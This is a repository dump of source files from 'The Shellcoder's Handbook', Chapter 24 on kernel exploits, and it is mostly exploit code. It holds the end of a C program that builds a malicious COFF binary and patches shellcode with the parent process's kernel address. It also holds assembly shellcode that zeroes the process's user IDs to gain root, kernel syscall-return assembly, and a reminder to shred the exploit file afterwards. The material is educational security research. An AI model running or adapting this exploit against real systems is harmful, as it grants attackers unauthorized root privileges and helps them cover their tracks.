scn2.s_flags = COFF_STYP_SHLIB; 220 | 221 | offset = sizeof(fhdr) + sizeof(ahdr) + (sizeof(scn0)*3) + 3*4096; 222 | ptr = (char *) malloc(offset); 223 | if(!ptr) { 224 | perror("malloc"); 225 | exit(-1); 226 | } 227 | 228 | memset(ptr, 0xcc, offset); /* fill int3 */ 229 | 230 | /* copy sections */ 231 | offset = 0; 232 | memcpy(ptr, (char *) &fhdr, sizeof(fhdr)); 233 | offset += sizeof(fhdr); 234 | 235 | memcpy(ptr+offset, (char *) &ahdr, sizeof(ahdr)); 236 | offset += sizeof(ahdr); 237 | 238 | memcpy(ptr+offset, (char *) &scn0, sizeof(scn0)); 239 | offset += sizeof(scn0); 240 | 241 | memcpy(ptr+offset, &scn1, sizeof(scn1)); 242 | offset += sizeof(scn1); 243 | 244 | memcpy(ptr+offset, (char *) &scn2, sizeof(scn2)); 245 | offset += sizeof(scn2); 246 | 247 | lptr = (u_long *) ((char *)ptr + sizeof(fhdr) + sizeof(ahdr) + \ 248 | (sizeof(scn0) * 3) + 4096 + 4096 + 0xb0 - 8); 249 | 250 | shptr = (char *) malloc(4096); 251 | if(!shptr) { 252 | perror("malloc"); 253 | exit(-1); 254 | } 255 | if(debug) 256 | printf("payload adr: 0x%.8x\t", shptr); 257 | 258 | memset(shptr, 0xcc, 4096); 259 | 260 | get_proc((pid_t) getppid(), &kp); 261 | pprocadr = (u_long) kp.kp_eproc.e_paddr; 262 | if(debug) 263 | printf("parent proc adr: 0x%.8x\n", pprocadr); 264 | 265 | *lptr++ = 0xdeadbeef; 266 | *lptr = (u_long) shptr; 267 | 268 | shellcode[5] = pprocadr & 0xff; 269 | shellcode[6] = (pprocadr >> 8) & 0xff; 270 | shellcode[7] = (pprocadr >> 16) & 0xff; 271 | shellcode[8] = (pprocadr >> 24) & 0xff; 272 | 273 | memcpy(shptr, shellcode, sizeof(shellcode)-1); 274 | 275 | unlink("./ibcs2own"); 276 | if((fd = open("./ibcs2own", O_CREAT^O_RDWR, 0755)) < 0) { 277 | perror("open"); 278 | exit(-1); 279 | } 280 | 281 | write(fd, ptr, sizeof(fhdr) + sizeof(ahdr) + (sizeof(scn0) * 3) + 4096*3); 282 | close(fd); 283 | free(ptr); 284 | 285 | signal(SIGSEGV, (void (*)())sig_handler); 286 | signal(SIGILL, (void (*)())sig_handler); 287 | signal(SIGSYS, (void (*)())sig_handler); 288 | signal(SIGBUS, (void (*)())sig_handler); 289 | signal(SIGABRT, (void (*)())sig_handler); 290 | signal(SIGTRAP, (void (*)())sig_handler); 291 | 292 | printf("\nDO NOT FORGET TO SHRED ./ibcs2own\n"); 293 | execve(args[0], args, envs); 294 | perror("execve"); 295 | } 296 | 297 | void 298 | sig_handler() 299 | { 300 | _exit(0); 301 | } 302 | 303 | void 304 | get_proc(pid_t pid, struct kinfo_proc *kp) 305 | { 306 | u_int arr[4], len; 307 | 308 | arr[0] = CTL_KERN; 309 | arr[1] = KERN_PROC; 310 | arr[2] = KERN_PROC_PID; 311 | arr[3] = pid; 312 | len = sizeof(struct kinfo_proc); 313 | if(sysctl(arr, 4, kp, &len, NULL, 0) < 0) { 314 | perror("sysctl"); 315 | fprintf(stderr, "this is an unexpected error, re-run!\n"); 316 | exit(-1); 317 | } 318 | 319 | } 320 | -------------------------------------------------------------------------------- /Chapter_24/Shellcoders24sampleprogram01.txt: -------------------------------------------------------------------------------- 1 | /* 2 | 3 | The Shellcoder's Handbook: Discovering and Exploiting Security Holes 4 | Jack Koziol, David Litchfield, Dave Aitel, Chris Anley, 5 | Sinan Eren, Neel Mehta, Riley Hassell 6 | Publisher: John Wiley & Sons 7 | ISBN: 0764544683 8 | 9 | Chapter 24: Kernel Exploits 10 | obsd_ex1.c 11 | 12 | Please send comments/feedback to jack@infosecinstitute.com or visit http://www.infosecinstitute.com 13 | 14 | */ 15 | 16 | 17 | 18 | call moo 19 | .long 0x12345678 <-- pproc addr 20 | .long 0xdeadcafe 21 | .long 0xbeefdead 22 | nop 23 | nop 24 | nop 25 | moo: 26 | pop %edi 27 | mov (%edi),%ecx # parent's proc addr in ecx 28 | 29 | # update p_ruid 30 | mov 0x10(%ecx),%ebx # ebx = p->p_cred 31 | xor %eax,%eax # eax = 0 32 | mov %eax,0x4(%ebx) # p->p_cred->p_ruid = 0 33 | 34 | # update cr_uid 35 | mov (%ebx),%edx # edx = p->p_cred->pc_ucred 36 | mov %eax,0x4(%edx) # p->p_cred->pc_ucred->cr_uid = 0 37 | -------------------------------------------------------------------------------- /Chapter_24/Shellcoders24sampleprogram02.txt: -------------------------------------------------------------------------------- 1 | /* 2 | 3 | The Shellcoder's Handbook: Discovering and Exploiting Security Holes 4 | Jack Koziol, David Litchfield, Dave Aitel, Chris Anley, 5 | Sinan Eren, Neel Mehta, Riley Hassell 6 | Publisher: John Wiley & Sons 7 | ISBN: 0764544683 8 | 9 | Chapter 24: Kernel Exploits 10 | obsd_ex1.c 11 | 12 | Please send comments/feedback to jack@infosecinstitute.com or visit http://www.infosecinstitute.com 13 | 14 | */ 15 | 16 | 17 | 18 | IDTVEC(syscall) 19 | pushl $2 # size of instruction for restart 20 | syscall1: 21 | pushl $T_ASTFLT # trap # for doing ASTs 22 | INTRENTRY 23 | movl _C_LABEL(cpl),%ebx 24 | movl TF_EAX(%esp),%esi # syscall no 25 | [1] call _C_LABEL(syscall) 26 | 2: /* Check for ASTs on exit to user mode. */ 27 | cli 28 | cmpb $0,_C_LABEL(astpending) 29 | je 1f 30 | /* Always returning to user mode here. */ 31 | movb $0,_C_LABEL(astpending) 32 | sti 33 | /* Pushed T_ASTFLT into tf_trapno on entry. */ 34 | call _C_LABEL(trap) 35 | jmp 2b 36 | 1: cmpl _C_LABEL(cpl),%ebx 37 | jne 3f 38 | [2] INTRFASTEXIT 39 | 40 | #define INTRFASTEXIT \ 41 | popl %es ; \ 42 | popl %ds ; \ 43 | popl %edi ; \ 44 | popl %esi ; \ 45 | popl %ebp ; \ 46 | popl %ebx ; \ 47 | popl %edx ; \ 48 | popl %ecx ; \ 49 | popl %eax ; \ 50 | addl $8,%esp ; \ 51 | iret 52 | 53 | # no interrupts while switching to user mode cli 54 | # what 'bout if astpending is set ? 55 | # screw it! async traps will hopefully be served later 56 | 57 | # set up various selectors for user-land 58 | # es = ds = 0x1f 59 | pushl $0x1f 60 | popl %es 61 | pushl $0x1f 62 | popl %ds 63 | 64 | # esi = esi = 0x00 65 | pushl $0x00 66 | popl %edi 67 | pushl $0x00 68 | popl %esi 69 | 70 | # ebp = 0xdfbfd000 71 | pushl $0xdfbfd000 72 | popl %ebp 73 | 74 | # ebx = edx = ecx = eax = 0x00 75 | pushl $0x00 76 | popl %ebx 77 | pushl $0x00 78 | popl %edx 79 | pushl $0x00 80 | popl %ecx 81 | pushl $0x00 82 | popl %eax 83 | 84 | pushl $0x1f # ss = 0x1f 85 | pushl $0xdfbfd000 # esp = 0xdfbfd000 86 | pushl $0x287 # eflags 87 | pushl $0x17 # cs user-land code segment selector 88 | 89 | # set set user mode instruction pointer in exploit code 90 | pushl $0x00000000 # empty slot for ring3 %eip 91 | iret 92 | -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- 1 | See here for details http://eu.wiley.com/WileyCDA/WileyTitle/productCd-0764544683.html 2 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | shellcoderhandbook 2 | ================== 3 | 4 | shellcoderhandbook source code : "The Shellcoder's Handbook: Discovering and Exploiting Security Holes" 5 | --------------------------------------------------------------------------------